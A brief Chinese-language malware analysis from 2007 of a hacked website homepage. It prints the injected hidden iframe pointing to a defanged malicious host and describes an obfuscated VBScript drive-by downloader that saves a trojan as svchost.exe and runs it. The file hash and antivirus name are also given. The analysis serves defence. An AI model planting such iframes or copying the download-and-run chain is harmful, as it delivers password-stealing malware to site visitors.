endurer 原创
2007-02-05 第1版
网站首页被加入代码:
/------
<iframe height=0 width=0 src="hxxp://www.g**ao**jun***888.com/4"></iframe>
------/
打开网页4 中包含Javascript代码,输出一段加入多余空格、使用escape()加密的VBScript脚本程序。
该VBScript脚本程序利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件txet.exe,保存为 %temp%/svchost.exe,然后调用自定义函数yunxingexe(m5,X skj9)。
自定义函数yunxingexe()创建Shell.Application 对象XsKje,利用 XsKje 的 ShellExecute 方法 来运行 %temp%/svchost.exe。
/------
文件说明符 : D:/test/txet.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-2-1 17:3:19
修改时间 : 2007-2-1 17:3:25
访问时间 : 2007-2-1 17:4:30
大小 : 62976 字节 61.512 KB
MD5 : 0d080a3e2205940a128ceb5df05db0b5
------/
Kapserky报为:Trojan-PSW.Win32.QQRob.iy
